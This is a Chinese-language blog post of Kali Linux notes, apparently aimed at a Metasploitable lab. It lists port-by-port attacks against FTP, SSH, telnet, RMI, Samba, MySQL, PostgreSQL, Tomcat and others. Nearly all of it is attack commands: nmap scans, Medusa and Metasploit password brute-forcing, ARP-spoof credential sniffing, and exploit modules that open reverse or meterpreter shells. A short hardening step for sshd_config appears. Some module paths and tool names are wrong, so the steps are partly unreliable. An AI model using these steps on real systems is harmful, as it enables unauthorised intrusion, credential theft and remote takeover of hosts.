kali對(duì)常見端口的漏洞破解收錄

```bash

1.web應(yīng)用漏洞掃描

1).Owasp-zap(掃描漏洞)

2).nikto(漏洞掃描)

nikto +host +"destip"

3).sqlmap(sql注入)

2.TCP漏洞利用

1).使用Nmap進(jìn)行端口掃描

nmap -p 21 "destip"

2).使用nc進(jìn)行ftp鏈接

nc “destip”

3.TCP密碼暴力破解

1).medusa

? Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

4.TCP用戶名明文密碼嗅探

1).arpspoof(對(duì)正在進(jìn)行TCP鏈接的兩臺(tái)機(jī)器進(jìn)行ARP嗅探)

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

2).wireshark(對(duì)兩臺(tái)正在進(jìn)行TCP鏈接的兩臺(tái)及其進(jìn)行數(shù)據(jù)監(jiān)控進(jìn)而獲取用戶名和密碼)

5.ssh環(huán)境搭建

6.ssh-Banner信息的獲取

1).nmap

nmap -sV -p 22 + “destip”

2).metaspolit

? 2.1).msfconsole以終端的形式啟動(dòng)metaspolit

? 2.2).use auxiliary/scanner/ssh/ssh_version

? 2.3).set rhosts 192.168.37.142

? 2.4).run

3).nc +"destip" +"端口號(hào)"

7.通過修改配置文件,可以使別人無法獲取ubuntu的版本信息

1).sudo gedit sshd_config

2).重啟服務(wù)

```

```c

1.ssh弱口令破解

1).medusa

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M mod

2).metasploit

? 2.1).msfconsole

? 2.2).使用use auxiliary/scanner/ssh/ssh_login

? 2.3).set rhosts 192.168.37.142

? 2.4).set username lzs

? 2.5).set password 123456

? 2.6).run

3).通過metasploit獲取meterpreter shell

2.ssh漏洞防護(hù)

1).修改sshd_config(ctrl+f 搜索port修改ssh的端口)

sudo gedit /etc/sshd_config

3.telnet信息獲取

1).使用namp對(duì)telnet進(jìn)行版本獲取

nmap -p 23 -sV 192.168.37.142

2).使用metasploit進(jìn)行版本獲取

2.1).msfconsole

2.2).use auxiliary/scanner/telnet/telnet_version

2.3).set rhost 192.168.37.142

2.4).run

4.telnet暴力密碼破解

1).使用metasploit進(jìn)行破解

? 1.1).msgconsole

? 1.2).use auxiliary/scanner/telnet/telnet_login

? 1.3).show options查看需要設(shè)置的參數(shù)

? 1.4).set user + 用戶名 --設(shè)置用戶名

? 1.5).set pass_file + 目標(biāo)文件 --設(shè)置用戶字典

? 1.6).set threads 10 設(shè)置線程數(shù)

? 1.7).run 運(yùn)行


5.rmi漏洞

1).使用nmap進(jìn)行端口掃描

? nmap -p 1099 -sV 192.168.1.9

2).使用metasploit進(jìn)行漏洞攻擊

? 2.1).msfconsole

? 2.2).use exploit/multi/misc/java_rmi_server

? 2.3).set rhost

? 2.4).set payload java/meterpreter/reverse_tcp

? 2.5).exploit


6.后門漏洞

1).使用nmap進(jìn)行端口掃描

nmap -p 1524 -sV 192.168.1.9

2).使用nc進(jìn)行鏈接

nc 192.168.1.9 1524


7.nfs漏洞

1).使用nmap端口掃描

nmap -p 2049 192.168.37.142

2).如果nfs配置不當(dāng),對(duì)方能對(duì)本機(jī)上的所有文件進(jìn)行操作

```

```cpp

1.rpcbind信息泄漏

1).nmap對(duì)111端口掃描獲取信息

nmap -p 111 -sV 192.168.37.142

2).nmap腳本對(duì)111進(jìn)行腳本探測

nmap -p 111 --script=rpcinfo 192.168.37.142

3).metasploit進(jìn)行端口掃描

3.1).msfconsole

3.2).use auxiliary/scanner/misc/sunrpc_portmapper

3.3).set rhost

3.4).run

2.samba RCE遠(yuǎn)程命令執(zhí)行漏洞利用(111端口漏洞)

1).metasploit

1.1).msfconsole

1.2).use exploit/multi/samba/usermap_script

1.3).set rhost

1.4).set payload cmd/unix/reverse

1.5).exploit(獲取shell)

3.rlogin最高權(quán)限登錄(需要目標(biāo)開放512,513端口)

1).使用namp對(duì)512,513端口進(jìn)行掃描

2).rlogin登錄

rlogin -l root 192.168.37.142

1.proftp測試

1.1).namp進(jìn)行端口掃描

nmap -p 2121 -sV 192.168.37.140

1.2).msf密碼破解

1).使用matesploit進(jìn)行破解

2.mysql弱口令破解

1.1).nmap進(jìn)行端口掃描

nmap -p 3306 -sV 192.168.37.140

1.2).msf進(jìn)行密碼破解

? 1.2.1).msfconsole

? 1.2.2).use auxiliary/scanner/mysql/mysql_login(使用這個(gè)模塊進(jìn)行破解)

? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)

1.3).通過mysql進(jìn)行登錄

? mysql -h 192.168.37.140 -u root

1.4).操作mysql的數(shù)據(jù)

3.postgresql數(shù)據(jù)庫密碼破解

1.1).nmap進(jìn)行端口掃描

nmap -p 5432 -sV 192.168.37.140

1.2).msf進(jìn)行暴力破解

? 1.2.1).msfconsole

? 1.2.2).use auxiliary/scanner/postgres/postgres_login使用這個(gè)模塊進(jìn)行破解)

? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)

1.3).使用msf獲取shell

? 1.3.1).msfconsole

? 1.3.2).use exploit/linux/postgres/postgres_payload 使用這個(gè)模塊進(jìn)行破解)

? 1.3.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)

? 1.3.4).exploit

4.vnc密碼破解

searchsploit vnc進(jìn)行版本漏洞查詢

同上面端口漏洞操作步驟?。?!

5.irc密碼破解

searchsploit irc進(jìn)行版本漏洞查詢

同上面端口漏洞操作步驟?。。?/p>

6.tomcat密碼破解

1.1).nmap進(jìn)行端口掃描

nmap -p 8180 -sV 192.168.37.140

1.2).msf進(jìn)行暴力破解

? 1.2.1).msfconsole

? 1.2.2).use auxiliary/scanner/http/tomcat_mgr_login 使用這個(gè)模塊進(jìn)行破解)

? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)

1.3).使用msf獲取shell

? 1.3.1).msfconsole

? 1.3.2).use exploit/linux/postgres/tomcat_mgr_deploy 使用這個(gè)模塊進(jìn)行破解)

? 1.3.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)

? 1.3.4).exploit

7.redis密碼破解

原理同上

```

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容